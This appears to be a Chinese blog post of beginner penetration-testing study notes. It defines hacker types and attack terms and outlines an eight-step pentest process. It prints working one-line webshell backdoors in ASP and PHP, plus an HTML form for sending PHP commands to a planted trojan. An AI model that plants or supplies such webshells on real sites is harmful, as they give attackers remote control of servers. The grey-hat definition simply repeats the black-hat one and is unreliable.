美文网首页
2020-08-24渗透测试学些day01

2020-08-24渗透测试学些day01

作者: lessismore_3602 | 来源:发表于2020-08-24 23:10 被阅读0次

    1、白帽子

    专门研究或者从事网络安全行业的人,通常受雇于各大安全公司,是提高网络、系统安全水平的主要力量

    2、黑帽子

    专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。

    3、灰帽子

    专门研究木马、操作系统、寻找漏洞,并且以个人意志为出发点,攻击网络或者计算机。

    术语词汇介绍

    1、脚本(asp、php、jsp)

    2、Html(css、js、HTML)

    3、HTTP协议

    4、CMS(B/S)

    5、MD5

    6、肉鸡:被黑客入侵并被长期驻扎的计算机或服务器

    7、抓鸡:利用使用大量的漏洞,使用自动化方式获取肉鸡的行为。

    8、Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。

    9、漏洞:硬件、软件、协议等可利用的安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。

    10、一句话木马:通过向服务端提交一句简短的代码,配合本地客户端实现Webshell功能的木马。

    <%eval request(“pass”)%>

    <%execute(request(“pass”))%>

    Request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。

    eval/execute 函数执行客户端命令的内容。

    11、php一句话木马:

    <?php eval($_POST[cracer]);?>

    下面的代码可以用POST的方式提交PHP语句,利用php脚本的各种函数,就可以实现执行系统命令、修改数据库、增删改文件等各种功能。

    <from method=post action=http://木马地址>

    <textarea name=cracer>

    //这里写PHP代码

    phpinfo();

    </textarea>

    <input type=submit>

    </from>

    12、提权:操作系统低权限的账户将自己升为管理员权限使用的方法

    13、后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”

    14、跳板:使用肉鸡IP来实现攻击其他目标,一遍更好的隐藏自己的身份信息。

    15、旁站入侵:同服务器下的网站入侵,入侵之后可以通过提权、跨目录等手段拿到目标网站的权限。常见的旁站查询工具:WebRobot、御剑、明小子和Web在线查询等。

    16、C端入侵:同C段下服务器入侵。利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有Windows下Cain,Linux下Sniffit、Snoop、Tcpdump、Dsniff等。

    渗透测试流程:

    1、明确目标:

    确定范围、确定规则、确定需求

    2、收集信息:

    基础信息、系统信息、应用信息、版本信息、服务信息、人员信息、防护信息

    3、漏洞探测:

    系统漏洞、WebServer漏洞、Web应用漏洞、其他端口服务漏洞、通信安全

    4、漏洞验证:

    自动化验证、手工验证、试验验证、登录猜解、业务漏洞验证、公开资源的利用

    5、信息整理:

    整理渗透工具、整理收集信息

    6、信息分析:

    精准打击、绕过防御机制、制定攻击路径、绕过检测机制

    7、获取所需:

    实施攻击、获取内部信息、进一步渗透、持续性存在、清理痕迹

    8、形成报告:

    按需整理、补充介绍、修补建议。

    相关文章

      网友评论

          本文标题:2020-08-24渗透测试学些day01

          本文链接:https://www.haomeiwen.com/subject/zvdybctx.html